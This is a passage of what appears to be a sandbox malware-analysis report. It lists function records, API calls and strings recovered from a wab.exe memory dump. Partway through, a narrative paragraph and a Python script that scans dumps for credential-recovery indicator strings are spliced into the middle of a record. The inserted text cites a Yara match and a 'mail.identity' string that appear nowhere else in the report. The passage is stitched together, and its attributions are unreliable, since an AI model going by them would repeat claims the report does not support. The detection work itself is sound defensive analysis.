                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??3@
                      • String ID:
                      • API String ID: 613200358-0
                      • Opcode ID: 95fe0c5ee96a68655d96064396ecbffa5b8939de9cee66978f58e17f988e32ec
                      • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                      • Opcode Fuzzy Hash: 95fe0c5ee96a68655d96064396ecbffa5b8939de9cee66978f58e17f988e32ec
                      • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                      APIs
                        • Part of subcall function 004176F4: memcmp.MSVCRT ref: 004177B6
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                      Strings
                      • recovered %d pages from %s, xrefs: 004188B4
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                      • String ID: recovered %d pages from %s
                      • API String ID: 985450955-1623757624
                      • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                      • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                      • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                      • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: _ultoasprintf
                      • String ID: %s %s %s
                      • API String ID: 432394123-3850900253
                      • Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                      • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                      • Opcode Fuzzy Hash: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                      • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                      APIs
                      • memset.MSVCRT ref: 00409919
                      • SendMessageA.USER32(N\@,00001019,00000000,?), ref: 00409948
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: MessageSendmemset
                      • String ID: N\@
                      • API String ID: 568519121-3851889168
                      • Opcode ID: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                      • Instruction ID: 8500237f8b168207f1c9a25e89cff2ec53edf3448a21c69821c5a9264d9502ca
                      • Opcode Fuzzy Hash: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                      • Instruction Fuzzy Hash: 3C016279800205AADB209F59C845AEBB7F8FF85B45F00802DE894B6241D374A945CB79
                      APIs
                      • LoadMenuA.USER32(00000000), ref: 00409078
                      • sprintf.MSVCRT ref: 0040909B
                        • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                        • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                        • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                        • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                        • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                        • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                        • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                      • String ID: menu_%d
                      • API String ID: 1129539653-2417748251
                      • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                      • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                      • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                      • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                      Strings
                      • failed memory resize %u to %u bytes, xrefs: 00411706
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: _msizerealloc
                      • String ID: failed memory resize %u to %u bytes
                      • API String ID: 2713192863-2134078882
                      • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                      • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                      • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                      • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                      APIs
                        • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104), ref: 00406FA1
                      • strrchr.MSVCRT ref: 00409808
                      • _mbscat.MSVCRT ref: 0040981D
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: FileModuleName_mbscatstrrchr
                      • String ID: _lng.ini
                      • API String ID: 3334749609-1948609170
                      • Opcode ID: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                      • Instruction ID: 627d3aba04136714d7c1818045af5338c576ea1e6c84acb30438f8bc90b354f8
                      • Opcode Fuzzy Hash: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                      • Instruction Fuzzy Hash: 73C080019497D018F12235212D03F4F06884F83709F34005FF801796C3EF9CA611407F
                      APIs
                      • _mbscpy.MSVCRT ref: 004070EB
                        • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                        • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                      • _mbscat.MSVCRT ref: 004070FA
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: _mbscat$_mbscpystrlen
                      • String ID: sqlite3.dll
                      • API String ID: 1983510840-1155512374
                      • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                      • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                      • Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                      • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                      APIs
                      • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: PrivateProfileString
                      • String ID: A4@$Server Details
                      • API String ID: 1096422788-4071850762
                      • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                      • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                      • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                      • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
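The function records above for the wab.exe memory dump (image base 00400000) carry several recoverable strings: `_lng.ini` and `menu_%d` next to LoadMenuA/GetMenuItemInfoA/ModifyMenuA, `mail.identity` next to `_strcmpi`, `sqlite3.dll` being appended to a path, the sqlite3 library strings `recovered %d pages from %s` and `failed memory resize %u to %u bytes`, and `Server Details` passed to GetPrivateProfileStringA. Taken together they fit the report's own Yara hit for the WebBrowserPassView password-recovery tool and its mail-credential signatures. The script below is an added example, not part of the Joe Sandbox report or of any analyzed code: it scans a dump for exactly those strings, maps each hit to the virtual address form the report's xrefs use (VA = base + offset), and turns the count of distinct indicator families into a verdict. The dump bytes it scans are constructed for the demo, and the grouping of strings into behaviours is this example's interpretation, not something the report states.

```python
"""Added triage example: locate the credential-recovery indicator strings
listed in the report inside a raw memory dump and map them to VAs.
The sample dump below is CONSTRUCTED; only the indicator strings themselves
are copied from the report's String IDs."""
import re
from dataclasses import dataclass

# Image base from the report's "Memory Dump Source" line (Offset: 00400000).
IMAGE_BASE = 0x00400000

# Indicator strings from this section's String IDs. The behaviour label is
# this example's own reading of the surrounding API calls (assumption).
INDICATORS = {
    b"_lng.ini":                            "nirsoft-style language file",
    b"menu_%d":                             "nirsoft-style menu localisation",
    b"mail.identity":                       "mail client identity lookup",
    b"sqlite3.dll":                         "browser sqlite store access",
    b"recovered %d pages from %s":          "embedded sqlite3 library",
    b"failed memory resize %u to %u bytes": "embedded sqlite3 library",
    b"Server Details":                      "INI-based configuration read",
}


@dataclass(frozen=True)
class Hit:
    indicator: str
    meaning: str
    offset: int   # byte offset inside the dump file
    va: int       # virtual address, the form the report's xrefs print


def va_to_offset(va: int, base: int = IMAGE_BASE) -> int:
    """Map a report VA (e.g. the xref 0x004188B4) back to a dump offset."""
    if va < base:
        raise ValueError(f"VA {va:#x} lies below image base {base:#x}")
    return va - base


def scan_dump(data: bytes, base: int = IMAGE_BASE) -> list[Hit]:
    """Return every indicator occurrence, ordered by offset."""
    hits = []
    for needle, meaning in INDICATORS.items():
        for m in re.finditer(re.escape(needle), data):
            hits.append(Hit(needle.decode(), meaning, m.start(), base + m.start()))
    return sorted(hits, key=lambda h: h.offset)


def classify(hits: list[Hit], threshold: int = 3) -> str:
    """Verdict on distinct indicator families; the threshold is a tuning knob."""
    kinds = {h.meaning for h in hits}
    if len(kinds) >= threshold and any("sqlite" in k or "mail" in k for k in kinds):
        return "credential-recovery module present"
    return "insufficient indicators"


def build_sample_dump() -> bytes:
    """Constructed stand-in for the dump: MZ header, zero padding, and four of
    the report's strings planted at known offsets."""
    buf = bytearray(b"MZ" + b"\x00" * 0x1000)
    planted = [
        (0x200, b"sqlite3.dll\x00"),
        (0x300, b"mail.identity\x00"),
        (0x400, b"_lng.ini\x00"),
        (0x500, b"recovered %d pages from %s\x00"),
    ]
    for off, s in planted:
        buf[off:off + len(s)] = s
    return bytes(buf)


if __name__ == "__main__":
    found = scan_dump(build_sample_dump())
    for h in found:
        print(f"{h.va:08X}  {h.indicator!r:40} {h.meaning}")
    print(classify(found))
```

To run it against the real artefact, replace `build_sample_dump()` with the bytes of the `.sdmp` file named in the Memory Dump Source line and keep `IMAGE_BASE` at the Offset the report gives; the printed VAs then line up with the `ref:` addresses in the API lists, and `va_to_offset` takes you from an xref such as 004188B4 to the byte position to inspect.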
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpy$memset
                      • String ID:
                      • API String ID: 438689982-0
                      • Opcode ID: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                      • Instruction ID: 02088d5bd302ba8124152156f4c24fba1fa2279ed4138068a4a2dd0dfc44ef6b
                      • Opcode Fuzzy Hash: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                      • Instruction Fuzzy Hash: BC61BDB2604712AFD710DF65E8C1B2BB7E5FF84304F40892EF99896250D338E955CB9A
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: FreeLocalmemcpymemsetstrlen
                      • String ID:
                      • API String ID: 3110682361-0
                      • Opcode ID: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                      • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                      • Opcode Fuzzy Hash: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                      • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpy
                      • String ID:
                      • API String ID: 3510742995-0
                      • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                      • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                      • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                      • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8